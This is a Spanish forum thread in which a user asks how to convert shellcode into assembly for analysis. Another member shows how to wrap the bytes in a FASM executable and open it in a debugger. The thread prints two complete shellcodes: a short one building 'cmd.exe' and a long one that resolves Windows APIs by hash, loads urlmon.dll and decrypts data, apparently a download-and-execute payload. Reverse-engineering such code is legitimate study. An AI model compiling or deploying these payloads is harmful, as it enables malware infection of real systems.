Shellcode/opcode to ASM?

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio

Ayuda

Ingresar

Registrarse

15 Marzo 2010, 19:14

Temas destacados: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderadores: Anon, berz3k)

Shellcode/opcode to ASM?

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Imprimir

Autor

Tema: Shellcode/opcode to ASM? (Leído 644 veces)

shimpei

Desconectado

Desconectado

Mensajes: 50

Ver Perfil

Shellcode/opcode to ASM?

« en: 15 Diciembre 2009, 02:46 »

alguien podria comentar sobre metodos practicos para pasar un shellcode a asm para analizarlo?


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

YST

Desconectado

Desconectado

Mensajes: 940

I'm you

Ver Perfil

WWW

Re: Shellcode/opcode to ASM?

« Respuesta #1 en: 15 Diciembre 2009, 03:22 »

No se si te entendi bien pero ... conviertes el shellcode a un hexadecimal comprencible para un ensamblador osea algo como por ejemplo :

ShellCode:

Código

char scode[]= // By Rojodos
   {0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xE6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4};

Para FASM:

Código

db 0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xE6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4

y luego en el mismo fasm en windows por ejemplo haces un

Código

include "win32ax.inc"
.code
start:
db 0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xE6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4
.end start

Luego abres el exe generado con un depurador por ejemplo el olly debug


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

shimpei

Desconectado

Desconectado

Mensajes: 50

Ver Perfil

Re: Shellcode/opcode to ASM?

« Respuesta #2 en: 15 Diciembre 2009, 03:52 »

ah, asi que solo deberia reemplazar las \ por 0 para poder compilarlo gracias a win32ax.inc

Citar

\x64\xA1\x18\x00\x00\x00\x8B\x40\x30\x8B\x40\x54\x8B\x40\x04\x8B
\x40\x04\x8B\x40\x04\x0D\x20\x00\x20\x00\x3D\x7C\x00\x77\x00\x74
\x01\xC3\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C
\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A
\x4E\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xC7\x45\x10\x6E\x2E\x65\x78\xC7
\x45\x14\xFF\x01\x00\x00\xC7\x45\x00\x00\x00\x00\x00\xEB\x4F\x5A
\x52\x83\xEA\x56\x89\x55\x18\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78
\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF
\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB
\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48
\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D
\x1C\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B
\xF7\xF2\xAE\x4F\x8B\x45\x10\xAB\x66\x98\x66\xAB\x33\xC0\xB8\x61
\x64\x00\x00\x50\x68\x54\x68\x72\x65\x35\x24\x1C\x69\x74\x50\x54
\x53\xB8\xAA\xFC\x0D\x7C\xFF\x55\x18\x83\xC4\x0C\x50\xB0\x6C\x8A
\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E
\x4E\x0E\xEC\xFF\x55\x18\x83\xC4\x0C\x93\x50\x33\xC0\x50\x50\x56
\x8B\x55\x18\x03\x55\x14\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x18
\x5B\x83\x7D\x00\x01\x0F\x85\x9E\x00\x00\x00\x6A\x00\x68\x80\x00
\x00\x00\x6A\x03\x6A\x00\x6A\x03\x68\x00\x00\x00\xC0\x56\xB8\xA5
\x17\x00\x7C\xFF\x55\x18\x89\x45\x04\x6A\x04\x68\x00\x10\x00\x00
\x68\x00\x00\x08\x00\x6A\x00\xB8\x54\xCA\xAF\x91\xFF\x55\x18\x89
\x45\x0C\x50\x6A\x00\x8D\x4D\x08\x51\x68\x00\x00\x08\x00\x50\xFF
\x75\x04\xB8\x16\x65\xFA\x10\xFF\x55\x18\x5F\x8B\x17\x83\xC7\x04
\x8B\x4D\x08\x83\xE9\x04\xE8\xA7\x00\x00\x00\x6A\x00\x6A\x00\x6A
\x00\xFF\x75\x04\xB8\xAC\x08\xDA\x76\xFF\x55\x18\x6A\x00\x8D\x4D
\x08\x51\xFF\x75\x08\xFF\x75\x0C\x83\x04\x24\x04\xFF\x75\x04\xB8
\x1F\x79\x0A\xE8\xFF\x55\x18\xFF\x75\x04\xB8\xFB\x97\xFD\x0F\xFF
\x55\x18\xC7\x45\x00\x02\x00\x00\x00\x57\x56\xB8\x98\xFE\x8A\x0E
\xFF\x55\x18\xEB\x2A\x18\x2A\xF9\xB7\xD2\x77\xB3\x01\x45\x8A\x92
\xB7\xAD\x50\x5D\xE4\x67\xF5\xE6\xC7\x1A\xBF\xAB\x1E\x10\x42\x76
\xA2\xA1\x54\x63\x09\x7B\x89\xB0\xF4\x97\x4E\x73\x93\x3F\xF1\x83
\x7D\x00\x02\x74\x60\xC7\x45\x00\x01\x00\x00\x00\xC7\x45\x10\x79
\x2E\x65\x78\xC7\x45\x14\x72\x01\x00\x00\x8B\x7D\x18\x03\x7D\x14
\xB9\x26\x00\x00\x00\x8B\x57\xFC\xE8\x05\x00\x00\x00\xE9\x7C\xFE
\xFF\xFF\x33\xC0\x8A\x07\xD2\xC8\x32\xC1\xF6\xD0\x32\xC5\x32\xC2
\x32\xC6\xD2\xC0\x02\xC1\x02\xC5\x02\xC2\x02\xC6\xD2\xC8\x2A\xC1
\x2A\xC5\xF6\xD0\x2A\xC2\x2A\xC6\xD2\xC0\xD3\xC2\x0F\xCA\x88\x07
\x47\x49\x75\xCE\xC3\xC3

ahora bajo el fasm y lo pruebo, muchas gracias YST!


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

YST

Desconectado

Desconectado

Mensajes: 940

I'm you

Ver Perfil

WWW

Re: Shellcode/opcode to ASM?

« Respuesta #3 en: 15 Diciembre 2009, 04:28 »

Si no me comi ningun caracter seria algo de esta manera

Código

db 0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x54,0x8B,0x40,0x04,0x8B,0x40,0x04,0x8B,0x40,0x04,0x0D,0x20,0x00,0x20,0x00,0x3D,0x7C,0x00,0x77,0x00,0x74,0x01,0xC3,0x33,0xC0,0x64,0x8B,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C0xAD,0x8B,0x58,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x58,0x3C,0x6A,0x4E,0x5A,0xD1,0xE2,x2B,0xE2,0x8B,0xEC,0xC7,0x45,0x10,0x6E,0x2E,0x65,0x78,0xC7,0x45,0x14,0xFF,0x01,0x00,0x00,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0xEB,0x4F,0x5A,0x52,0x83,0xEA,0x56,0x89,0x55,0x18,0x56,0x57,0x8B,0x73,0x3C,0x8B,0x74,0x33,0x78,0x03,0xF3,0x56,0x8B,0x76,0x20,0x03,0xF3,0x33,0xC9,0x49,0x50,0x41,0xAD,0x33,0xFF,0x36,0x0F,0xBE,0x14,0x03,0x38,0xF2,0x74,0x08,0xC1,0xCF,0x0D,0x03,0xFA,0x40,0xEB,0xEF,0x58,0x3B,0xF8,0x75,0xE5,0x5E,0x8B,0x46,0x24,0x03,0xC3,0x66,0x8B,0x0C,0x48,0x8B,0x56,0x1C,0x03,0xD3,0x8B,0x04,0x8A,0x03,0xC3,0x5F,0x5E,0x50,0xC3,0x8D,0x7D,0x1C,0x57,0x52,0xB8,0x33,0xCA,0x8A,0x5B,0xE8,0xA2,0xFF,0xFF,0xFF,0x32,0xC0,0x8B,0xF7,0xF2,0xAE,0x4F,0x8B,0x45,0x10,0xAB,0x66,0x98,0x66,0xAB,0x33,0xC0,0xB8,0x61,0x64,0x00,0x00,0x50,0x68,0x54,0x68,0x72,0x65,0x35,0x24,0x1C,0x69,0x74,0x50,0x54,0x53,0xB8,0xAA,0xFC,0x0D,0x7C,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x50,0xB0,0x6C,0x8A,0xE0,0x98,0x50,0x68,0x6F,0x6E,0x2E,0x64,0x68,0x75,0x72,0x6C,0x6D,0x54,0xB8,0x8E,0x4E,0x0E,0xEC,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x93,0x50,0x33,0xC0,0x50,0x50,0x56,0x8B,0x55,0x18,0x03,0x55,0x14,0x52,0x50,0xB8,0x36,0x1A,0x2F,0x70,0xFF,0x55,0x18,0x5B,0x83,0x7D,0x00,0x01,0x0F,0x85,0x9E,0x00,0x00,0x00,0x6A,0x00,0x68,0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x56,0xB8,0xA5,0x17,0x00,0x7C,0xFF,0x55,0x18,0x89,0x45,0x04,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x08,0x00,0x6A,0x00,0xB8,0x54,0xCA,0xAF,0x91,0xFF,0x55,0x18,0x89,0x45,0x0C,0x50,0x6A,0x00,0x8D,0x4D,0x08,0x51,0x68,0x00,0x00,0x08,0x00,0x50,0xFF,0x75,0x04,0xB8,0x16,0x65,0xFA,0x10,0xFF,0x55,0x18,0x5F,0x8B,0x17,0x83,0xC7,0x04,0x8B,0x4D,0x08,0x83,0xE9,0x04,0xE8,0xA7,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x75,0x04,0xB8,0xAC,0x08,0xDA,0x76,0xFF,0x55,0x18,0x6A,0x00,0x8D,0x4D,0x08,0x51,0xFF,0x75,0x08,0xFF,0x75,0x0C,0x83,0x04,0x24,0x04,0xFF,0x75,0x04,0xB8,0x1F,0x79,0x0A,0xE8,0xFF,0x55,0x18,0xFF,0x75,0x04,0xB8,0xFB,0x97,0xFD,0x0F,0xFF,0x55,0x18,0xC7,0x45,0x00,0x02,0x00,0x00,0x00,0x57,0x56,0xB8,0x98,0xFE,0x8A,0x0E,0xFF,0x55,0x18,0xEB,0x2A,0x18,0x2A,0xF9,0xB7,0xD2,0x77,0xB3,0x01,0x45,0x8A,0x92,0xB7,0xAD,0x50,0x5D,0xE4,0x67,0xF5,0xE6,0xC7,0x1A,0xBF,0xAB,0x1E,0x10,0x42,0x76,0xA2,0xA1,0x54,0x63,0x09,0x7B,0x89,0xB0,0xF4,0x97,0x4E,0x73,0x93,0x3F,0xF1,0x83,0x7D,0x00,0x02,0x74,0x60,0xC7,0x45,0x00,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x79,0x2E,0x65,0x78,0xC7,0x45,0x14,0x72,0x01,0x00,0x00,0x8B,0x7D,0x18,0x03,0x7D,0x14,0xB9,0x26,0x00,0x00,0x00,0x8B,0x57,0xFC,0xE8,0x05,0x00,0x00,0x00,0xE9,0x7C,0xFE,0xFF,0xFF,0x33,0xC0,0x8A,0x07,0xD2,0xC8,0x32,0xC1,0xF6,0xD0,0x32,0xC5,0x32,0xC2,0x32,0xC6,0xD2,0xC0,0x02,0xC1,0x02,0xC5,0x02,0xC2,0x02,0xC6,0xD2,0xC8,0x2A,0xC1,0x2A,0xC5,0xF6,0xD0,0x2A,0xC2,0x2A,0xC6,0xD2,0xC0,0xD3,0xC2,0x0F,0xCA,0x88,0x07,0x47,0x49,0x75,0xCE,0xC3,


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

shimpei

Desconectado

Desconectado

Mensajes: 50

Ver Perfil

Re: Shellcode/opcode to ASM?

« Respuesta #4 en: 17 Diciembre 2009, 17:51 »

intente compilar ese shellcode y me tiro error :-X

:-X

de todas formas gracias YST


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

YST

Desconectado

Desconectado

Mensajes: 940

I'm you

Ver Perfil

WWW

Re: Shellcode/opcode to ASM?

« Respuesta #5 en: 17 Diciembre 2009, 20:15 »

Vez me comí caracteres :xD

:xD

Código

include "win32ax.inc"
.code
start:
db 0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x54,0x8B,0x40,0x04,0x8B,0x40,0x04,0x8B,0x40,0x04,0x0D,0x20,0x00,0x20,0x00,0x3D,0x7C,0x00,0x77,0x00,0x74,0x01,0xC3,0x33,0xC0,0x64,0x8B,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x58,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x58,0x3C,0x6A,0x4E,0x5A,0xD1,0xE2,0x2B,0xE2,0x8B,0xEC,0xC7,0x45,0x10,0x6E,0x2E,0x65,0x78,0xC7,0x45,0x14,0xFF,0x01,0x00,0x00,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0xEB,0x4F,0x5A,0x52,0x83,0xEA,0x56,0x89,0x55,0x18,0x56,0x57,0x8B,0x73,0x3C,0x8B,0x74,0x33,0x78,0x03,0xF3,0x56,0x8B,0x76,0x20,0x03,0xF3,0x33,0xC9,0x49,0x50,0x41,0xAD,0x33,0xFF,0x36,0x0F,0xBE,0x14,0x03,0x38,0xF2,0x74,0x08,0xC1,0xCF,0x0D,0x03,0xFA,0x40,0xEB,0xEF,0x58,0x3B,0xF8,0x75,0xE5,0x5E,0x8B,0x46,0x24,0x03,0xC3,0x66,0x8B,0x0C,0x48,0x8B,0x56,0x1C,0x03,0xD3,0x8B,0x04,0x8A,0x03,0xC3,0x5F,0x5E,0x50,0xC3,0x8D,0x7D,0x1C,0x57,0x52,0xB8,0x33,0xCA,0x8A,0x5B,0xE8,0xA2,0xFF,0xFF,0xFF,0x32,0xC0,0x8B,0xF7,0xF2,0xAE,0x4F,0x8B,0x45,0x10,0xAB,0x66,0x98,0x66,0xAB,0x33,0xC0,0xB8,0x61,0x64,0x00,0x00,0x50,0x68,0x54,0x68,0x72,0x65,0x35,0x24,0x1C,0x69,0x74,0x50,0x54,0x53,0xB8,0xAA,0xFC,0x0D,0x7C,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x50,0xB0,0x6C,0x8A,0xE0,0x98,0x50,0x68,0x6F,0x6E,0x2E,0x64,0x68,0x75,0x72,0x6C,0x6D,0x54,0xB8,0x8E,0x4E,0x0E,0xEC,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x93,0x50,0x33,0xC0,0x50,0x50,0x56,0x8B,0x55,0x18,0x03,0x55,0x14,0x52,0x50,0xB8,0x36,0x1A,0x2F,0x70,0xFF,0x55,0x18,0x5B,0x83,0x7D,0x00,0x01,0x0F,0x85,0x9E,0x00,0x00,0x00,0x6A,0x00,0x68,0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x56,0xB8,0xA5,0x17,0x00,0x7C,0xFF,0x55,0x18,0x89,0x45,0x04,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x08,0x00,0x6A,0x00,0xB8,0x54,0xCA,0xAF,0x91,0xFF,0x55,0x18,0x89,0x45,0x0C,0x50,0x6A,0x00,0x8D,0x4D,0x08,0x51,0x68,0x00,0x00,0x08,0x00,0x50,0xFF,0x75,0x04,0xB8,0x16,0x65,0xFA,0x10,0xFF,0x55,0x18,0x5F,0x8B,0x17,0x83,0xC7,0x04,0x8B,0x4D,0x08,0x83,0xE9,0x04,0xE8,0xA7,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x75,0x04,0xB8,0xAC,0x08,0xDA,0x76,0xFF,0x55,0x18,0x6A,0x00,0x8D,0x4D,0x08,0x51,0xFF,0x75,0x08,0xFF,0x75,0x0C,0x83,0x04,0x24,0x04,0xFF,0x75,0x04,0xB8,0x1F,0x79,0x0A,0xE8,0xFF,0x55,0x18,0xFF,0x75,0x04,0xB8,0xFB,0x97,0xFD,0x0F,0xFF,0x55,0x18,0xC7,0x45,0x00,0x02,0x00,0x00,0x00,0x57,0x56,0xB8,0x98,0xFE,0x8A,0x0E,0xFF,0x55,0x18,0xEB,0x2A,0x18,0x2A,0xF9,0xB7,0xD2,0x77,0xB3,0x01,0x45,0x8A,0x92,0xB7,0xAD,0x50,0x5D,0xE4,0x67,0xF5,0xE6,0xC7,0x1A,0xBF,0xAB,0x1E,0x10,0x42,0x76,0xA2,0xA1,0x54,0x63,0x09,0x7B,0x89,0xB0,0xF4,0x97,0x4E,0x73,0x93,0x3F,0xF1,0x83,0x7D,0x00,0x02,0x74,0x60,0xC7,0x45,0x00,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x79,0x2E,0x65,0x78,0xC7,0x45,0x14,0x72,0x01,0x00,0x00,0x8B,0x7D,0x18,0x03,0x7D,0x14,0xB9,0x26,0x00,0x00,0x00,0x8B,0x57,0xFC,0xE8,0x05,0x00,0x00,0x00,0xE9,0x7C,0xFE,0xFF,0xFF,0x33,0xC0,0x8A,0x07,0xD2,0xC8,0x32,0xC1,0xF6,0xD0,0x32,0xC5,0x32,0xC2,0x32,0xC6,0xD2,0xC0,0x02,0xC1,0x02,0xC5,0x02,0xC2,0x02,0xC6,0xD2,0xC8,0x2A,0xC1,0x2A,0xC5,0xF6,0xD0,0x2A,0xC2,0x2A,0xC6,0xD2,0xC0,0xD3,0xC2,0x0F,0xCA,0x88,0x07,0x47,0x49,0x75,0xCE,0xC3
.end start


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

Páginas: [1]

Ir Arriba

Imprimir

Ir a:

Yashira.org Videojuegos indetectables.net Seguridad Informatica Colombia Indejuegos Internet móvil

Noticias Informatica Seguridad Informática ADSL eNYe Sec Seguridad Wireless Underground México Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC